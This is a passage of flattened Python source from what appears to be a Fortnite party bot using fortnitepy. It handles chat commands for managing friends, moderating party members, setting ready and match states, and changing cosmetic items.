await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.is_pending(user.id):
await reply(message, client, l('not_pending_with_user'))
return
await client.accept_friend(user.id)
await reply(message, client, l('friend_add', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.is_pending(user.id):
await reply(message, client, l('not_pending_with_user'))
return
await client.accept_friend(user.id)
await reply(message, client, l('friend_add', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_accepting_friendrequest'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_accept_pending')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_accepting_friendrequest'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['declinepending']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['declinepending']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_pending(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_pending(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_pending(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.is_pending(user.id):
await reply(message, client, l('nor_pending_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('friend_request_decline', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.is_pending(user.id):
await reply(message, client, l('nor_pending_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('friend_request_decline', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_declining_friendrequest'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_decline_pending')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_declining_friendrequest'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['blockfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['blockfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and not client.is_blocked(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and not client.is_blocked(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if not client.is_blocked(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if client.is_blocked(user.id):
await reply(message, client, l('already_block'))
return
await client.block_user(user.id)
await reply(message, client, l('block_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if client.is_blocked(user.id):
await reply(message, client, l('already_block'))
return
await client.block_user(user.id)
await reply(message, client, l('block_user', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_blocking_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_block_user')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_blocking_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['unblockfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['unblockfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_blocked(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_blocked(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_blocked(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.is_blocked(user.id):
await reply(message, client, l('not_block'))
return
await client.unblock_user(user.id)
await reply(message, client, l('unblock_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.is_blocked(user.id):
await reply(message, client, l('not_block'))
return
await client.unblock_user(user.id)
await reply(message, client, l('unblock_user', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_unblocking_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_unblock_user')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_unblocking_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['voice']:
try:
if args[1] in commands['true']:
client.voice = True
await client.enable_voice()
send(display_name,l('set_to', 'voice', l('on')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', 'voice', l('on')))
elif args[1] in commands['false']:
client.voice = False
await client.disable_voice()
send(display_name,l('set_to', 'voice', l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', 'voice', l('off')))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands[key]}] [[{commands['true']}] / [{commands['false']}]]")
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
elif args[0] in commands['chatban']:
try:
reason = rawcontent.split(' : ')
if rawcontent == '':
await reply(message, client, f"[{commands['chatban']}] [{l('name_or_id')}] : [{l('reason')}({l('optional')})]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
try:
await member.chatban(reason[1])
except IndexError:
await member.chatban()
await reply(message, client, l('chatban_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
try:
await member.chatban(reason[1])
except IndexError:
await member.chatban()
await reply(message, client, l('chatban_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_chatban'))""" for user in users.values()
],
"variable": [
{"user": user, "reason": reason} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_chatban')}"
await reply(message, client, text)
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_chatban'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['promote']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['promote']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.promote()
await reply(message, client, l('promote_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.promote()
await reply(message, client, l('promote_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_party_leader'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_promoting_party_leader'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_promote_user')}"
await reply(message, client, text)
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_party_leader'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_promoting_party_leader'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['kick']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['kick']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.kick()
await reply(message, client, l('kick_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.kick()
await reply(message, client, l('kick_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('cant_kick_yourself'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_kicking_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_kick_user')}"
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('cant_kick_yourself'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_kicking_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['hide']:
try:
if rawcontent == '':
await client.hide()
await reply(message, client, l('hide_all_user'))
else:
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.hide(member.id)
await reply(message, client, l('hide_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.hide(member.id)
await reply(message, client, l('hide_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_hide_user')}"
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['show']:
try:
if rawcontent == '':
await client.show()
await reply(message, client, l('show_all_user'))
else:
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.show(member.id)
await reply(message, client, l('show_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.show(member.id)
await reply(message, client, l('show_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_show_user')}"
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['ready']:
try:
await client.party.me.set_ready(fortnitepy.ReadyState.READY)
await reply(message, client, l('set_to', l('readystate'), l('ready')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['unready']:
try:
await client.party.me.set_ready(fortnitepy.ReadyState.NOT_READY)
await reply(message, client, l('set_to', l('readystate'), l('unready')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['sitout']:
try:
await client.party.me.set_ready(fortnitepy.ReadyState.SITTING_OUT)
await reply(message, client, l('set_to', l('readystate'), l('sitout')))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['match']:
try:
await client.party.me.set_in_match(players_left=int(args[1]) if args[1:2] else 100)
await reply(message, client, l('set_to', l('matchstate'), l('remaining', args[1] if args[1:2] else "100")))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('remaining_must_be_between_0_and_255'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['unmatch']:
try:
await client.party.me.clear_in_match()
await reply(message, client, l('set_to', l('matchstate'), l('off')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['swap']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['swap']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
real_members = client.party.meta.squad_assignments
assignments = client.visual_members
await member.swap_position()
await reply(message, client, l('swap_user', f'{name(user)}'))
if client.party.me.leader:
await asyncio.sleep(0.5)
prop = client.party.meta.set_squad_assignments(assignments)
await client.party.patch(updated=prop)
await asyncio.sleep(2)
client.party.meta.set_squad_assignments(real_members)
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
real_members = client.party.meta.squad_assignments
assignments = client.visual_members
await member.swap_position()
await reply(message, client, l('swap_user', f'{name(user)}}'))
if client.party.me.leader:
await asyncio.sleep(0.5)
prop = client.party.meta.set_squad_assignments(assignments)
await client.party.patch(updated=prop)
client.party.meta.set_squad_assignments(real_members)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_swapping_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_swap_user')}"
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_swapping_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['stop']:
try:
client.stopcheck = True
if await client.change_asset(message.author.id, "Emote", ""):
await reply(message, client, l('stopped'))
else:
await reply(message, client, l('locked'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['setenlightenment']:
try:
if await client.change_asset(message.author.id, "Outfit", client.party.me.outfit, client.party.me.outfit_variants,(args[1],args[2])) is True:
await reply(message, client, l('set_to', 'enlightenment', f'{args[1]}, {args[2]}'))
else:
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['setenlightenment']}] [{l('number')}] [{l('number')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addeditems']:
try:
async with aiohttp.ClientSession() as session:
res = await session.get("https://benbotfn.tk/api/v1/newCosmetics")
res = await res.json()
flag = False
items = res["items"]
for item in items:
if client.stopcheck:
client.stopcheck = False
break
if item["backendType"] in ignoretype:
continue
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item["id"]):
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
await asyncio.sleep(5)
else:
await reply(message, client, l('all_end', l('addeditem')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['shopitems']:
try:
store = await client.fetch_item_shop()
items = []
for item in (store.featured_items
+ store.daily_items
+ store.special_featured_items
+ store.special_daily_items):
for grant in item.grants:
if convert_backend_type(grant["type"]) in ignoretype:
continue
item = {
"id": grant["asset"],
"type": convert_to_asset(convert_to_old_type(convert_backend_type(grant["type"]))),
"backendType": grant["type"]
}
items.append(item)
for item in items:
if client.stopcheck:
client.stopcheck = False
break
if item["backendType"] in ignoretype:
continue
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item["id"]):
i = await loop.run_in_executor(None,search_item,data["search-lang"],"id",item["id"],convert_backend_type(item["backendType"]))
if i:
i = i[0]
if data['loglevel'] == 'normal':
await reply(message, client, f"{i['shortDescription']}: {i['name']}")
else:
await reply(message, client, f"{i['shortDescription']}: {i['name']} | {i['id']}")
else:
await reply(message, client, item["id"])
await asyncio.sleep(5)
else:
await reply(message, client, l('all_end', l('shopitem')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif True in [args[0] in commands[key] for key in ("alloutfit", "allbackpack", "allpet", "allpickaxe", "allemote", "allemoji", "alltoy")]:
type_ = convert_to_type(args[0])
try:
if getattr(client,f"{convert_to_old_type(type_)}lock") and client.lock_check(message.author.id):
await reply(message, client, l('locked'))
return
with open(f'items/{type_}_{data["search-lang"]}.json', 'r', encoding='utf-8') as f:
allitem = json.load(f)
for item in allitem:
if client.stopcheck:
client.stopcheck = False
break
await client.change_asset(message.author.id, type_, item["id"])
await asyncio.sleep(2)
else:
await reply(message, client, l('all_end', l(convert_to_old_type(type_))))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif True in [args[0] in commands[key] for key in ("cid", "bid", "petcarrier", "pickaxe_id", "eid", "emoji_id", "toy_id", "id")]:
type_ = convert_to_type(args[0])
if rawcontent == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [ID]")
return
try:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "id", rawcontent, type_)
if result is None and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "id", rawcontent, type_)
if result is None:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]['backendType']), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item['backendType']), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif True in [args[0] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe", "emote", "emoji", "toy", "item")]:
type_ = convert_to_type(args[0])
if rawcontent == '':
